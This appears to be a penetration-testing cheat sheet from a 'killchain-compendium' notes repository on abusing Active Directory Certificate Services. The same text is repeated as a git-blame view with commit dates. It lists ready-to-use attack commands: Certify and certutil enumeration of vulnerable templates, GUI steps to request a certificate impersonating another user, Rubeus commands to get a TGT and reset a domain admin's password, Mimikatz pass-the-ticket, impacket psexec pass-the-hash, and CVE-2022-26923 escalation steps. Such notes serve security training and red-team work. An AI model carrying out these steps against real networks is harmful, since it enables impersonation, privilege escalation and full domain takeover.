killchain-compendium/Cryptography/Active Directory/Active Directory Certificat...

## Active Directory Certificate Service ADCS

* Internal CA
* PKI
* File system encryption
* Digital signatures
* User authentication

* __Certificates will not be revoked after account password reset__

## Certificate Templates

* Extended/Enhanced Key Usage (EKU)
* Parameter combination can be exploited
* User Certificates may be requested from a member of a Domain User Group
* Machine Certifcates may be requested from a host of a Domain Computer Group 

### Enumeration

* [PSPKIAudit](https://github.com/GhostPack/PSPKIAudit)

```sh
certutil -v -template > ct.txt
```

Exploitable templates should have the following traits:
* `Allow Enroll` or `Allow Full Control` permissions to request certificate
    * Find groups by `net user <username> /domain` --> `Domain Users`, `Domain Computers`
* Client authentication EKU for Kerberos authentication --> `Client Authentication`
* Permission to subject alternative name (SAN), e.g. URL to encrypt. Used to create Kerberos ticket, --> `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`

#### Certify

Find information about all registered CAs. For a start take a look at least at
```sh
Certify.exe find /vulnerable
```

 
### Certificate Creation

* `Win+R` --> `mmc` --> `File` --> `Add/Remove Snap-in` --> `Certificates` (Request Certificate if administration account --> Computer Account)
* After that in the main menu, `Certificates` --> right click on `Personal` --> `All Tasks` --> `Request Certificates` --> `Next` --> `Next` --> `More information is required to enroll this certificate` --> `Common Name` --> `CN=concerto` && `User Principal Name` is the user to impersonate --> `OK` --> select `User Request` --> `Enroll`
* After that in the main menu, `Personal` --> `Certificates` --> __The certificate__
* Right click certificate --> `All Tasks` --> `Export` --> `Yes, export private key` --> `PFX` --> set `Password` --> Save

An alternative is certipy-ad

#### Certipy-AD

First  `pip install certipy-ad`
Take a look at the Documentation provided in the [git repositories'
README](https://github.com/ly4k/Certipy?source=post_page-----c56f238991c0--------------------------------#esc7).
Since it is possible to create certifcates of (Sub)CAs if you do have the right permissions on CA directly, it is worth a check.
[Hacktricks' AD CS Domain Escalation](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation) provides the details.

### Impersonation 

Request TGT with the created cert.

#### On the target machine via
```sh
Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to.kirbi> /domain:<domain name> /dc:<IP of domain controller>
```
Select a domain admin via opening `Active Directory Users and Computers`
```sh
.\Rubeus.exe changepw /ticket:<ticketfilename> /new:<new password> /dc:<domain of controller> /targetuser:<domain>\<dauser>
```
* `runas /user:<domain>\<username of DA> cmd.exe`

* Alternatively, load the outfile of rubeus via mimikatz to authenticate as the impersonated user on a remote domain
```sh
privilege::debug
kerberos::ptt <name of file to write TGT to.kirbi>
exit
dir \\<domain>\<dir>$\
```

#### On the attacking machine

Use impacket's psexec
```sh
psexec.py $DOMAIN/administrator@$DOMAIN -hashes $found_hash -dc-ip $DC_IP
```

## CVE-2022-26923

* Aims on abusing templates configuration, the Subject Alternative Name `SAN`. Set it to someone with higher permissions
* User and Machine certificate templates
* User Principal Name is used for `SAN`, this template can not be modified in a way to escalate privileges
* Computer accounts DNS name is used for `SAN`
* Users of the Authenticated Users Group can create 10 Machine Certificates
* __DNS hostname__ is used for authentication
* __Service Principal Names (SPN)__, associates a service logon with a service instance. SPNs are unique
* Permissions of interest, all two are needed
    * Validate write to DNS hostname allows to update DNS hostname of AD object associated with the host
    * Validate write to SPN, update SPN of the AD object associated with the host

### Usage

* User account has to be compromised, use it to enrol a new host on the domain
* Alter the DNS hostname attribute of the AD Object to one of a Domain Controller or other higher privilege
* Remove the SPN attribute to bypass the unique SPN
* With the default template request the machine cert
* authenticate via Kerberos with the template as the higher privileged machine
restructured Misc and RevShells 2022-11-13 16:00:22 +01:00			`## Active Directory Certificate Service ADCS`

			`* Internal CA`
			`* PKI`
			`* File system encryption`
			`* Digital signatures`
			`* User authentication`

			`* __Certificates will not be revoked after account password reset__`

			`## Certificate Templates`

			`* Extended/Enhanced Key Usage (EKU)`
			`* Parameter combination can be exploited`
			`* User Certificates may be requested from a member of a Domain User Group`
			`* Machine Certifcates may be requested from a host of a Domain Computer Group`

			`### Enumeration`

			`* [PSPKIAudit](https://github.com/GhostPack/PSPKIAudit)`

			```sh
			`certutil -v -template > ct.txt`
			```

			`Exploitable templates should have the following traits:`
			* `Allow Enroll` or `Allow Full Control` permissions to request certificate
			* Find groups by `net user <username> /domain` --> `Domain Users`, `Domain Computers`
			* Client authentication EKU for Kerberos authentication --> `Client Authentication`
			* Permission to subject alternative name (SAN), e.g. URL to encrypt. Used to create Kerberos ticket, --> `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`
AD certificate and docker escapes 2024-01-11 05:40:49 +01:00
			`#### Certify`

			`Find information about all registered CAs. For a start take a look at least at`
			```sh
			`Certify.exe find /vulnerable`
			```

restructured Misc and RevShells 2022-11-13 16:00:22 +01:00
			`### Certificate Creation`

			* `Win+R` --> `mmc` --> `File` --> `Add/Remove Snap-in` --> `Certificates` (Request Certificate if administration account --> Computer Account)
			* After that in the main menu, `Certificates` --> right click on `Personal` --> `All Tasks` --> `Request Certificates` --> `Next` --> `Next` --> `More information is required to enroll this certificate` --> `Common Name` --> `CN=concerto` && `User Principal Name` is the user to impersonate --> `OK` --> select `User Request` --> `Enroll`
			* After that in the main menu, `Personal` --> `Certificates` --> __The certificate__
			* Right click certificate --> `All Tasks` --> `Export` --> `Yes, export private key` --> `PFX` --> set `Password` --> Save

AD certificate and docker escapes 2024-01-11 05:40:49 +01:00			`An alternative is certipy-ad`

			`#### Certipy-AD`

			First `pip install certipy-ad`
			`Take a look at the Documentation provided in the [git repositories'`
			`README](https://github.com/ly4k/Certipy?source=post_page-----c56f238991c0--------------------------------#esc7).`
			`Since it is possible to create certifcates of (Sub)CAs if you do have the right permissions on CA directly, it is worth a check.`
			`[Hacktricks' AD CS Domain Escalation](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation) provides the details.`
bump 2023-08-31 15:15:52 +02:00
restructured Misc and RevShells 2022-11-13 16:00:22 +01:00			`### Impersonation`

AD certificate and docker escapes 2024-01-11 05:40:49 +01:00			`Request TGT with the created cert.`
restructured Misc and RevShells 2022-11-13 16:00:22 +01:00
AD certificate and docker escapes 2024-01-11 05:40:49 +01:00			`#### On the target machine via`
restructured Misc and RevShells 2022-11-13 16:00:22 +01:00			```sh
			`Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to.kirbi> /domain:<domain name> /dc:<IP of domain controller>`
			```
AD certificate and docker escapes 2024-01-11 05:40:49 +01:00			Select a domain admin via opening `Active Directory Users and Computers`
restructured Misc and RevShells 2022-11-13 16:00:22 +01:00			```sh
			`.\Rubeus.exe changepw /ticket:<ticketfilename> /new:<new password> /dc:<domain of controller> /targetuser:<domain>\<dauser>`
			```
			* `runas /user:<domain>\<username of DA> cmd.exe`

			`* Alternatively, load the outfile of rubeus via mimikatz to authenticate as the impersonated user on a remote domain`
			```sh
			`privilege::debug`
			`kerberos::ptt <name of file to write TGT to.kirbi>`
			`exit`
			`dir \\<domain>\<dir>$\`
			```

AD certificate and docker escapes 2024-01-11 05:40:49 +01:00			`#### On the attacking machine`

			`Use impacket's psexec`
			```sh
			`psexec.py $DOMAIN/administrator@$DOMAIN -hashes $found_hash -dc-ip $DC_IP`
			```

restructured Misc and RevShells 2022-11-13 16:00:22 +01:00			`## CVE-2022-26923`

			* Aims on abusing templates configuration, the Subject Alternative Name `SAN`. Set it to someone with higher permissions
			`* User and Machine certificate templates`
			* User Principal Name is used for `SAN`, this template can not be modified in a way to escalate privileges
			* Computer accounts DNS name is used for `SAN`
			`* Users of the Authenticated Users Group can create 10 Machine Certificates`
			`* __DNS hostname__ is used for authentication`
			`* __Service Principal Names (SPN)__, associates a service logon with a service instance. SPNs are unique`
			`* Permissions of interest, all two are needed`
			`* Validate write to DNS hostname allows to update DNS hostname of AD object associated with the host`
			`* Validate write to SPN, update SPN of the AD object associated with the host`

			`### Usage`

			`* User account has to be compromised, use it to enrol a new host on the domain`
			`* Alter the DNS hostname attribute of the AD Object to one of a Domain Controller or other higher privilege`
			`* Remove the SPN attribute to bypass the unique SPN`
			`* With the default template request the machine cert`
			`* authenticate via Kerberos with the template as the higher privileged machine`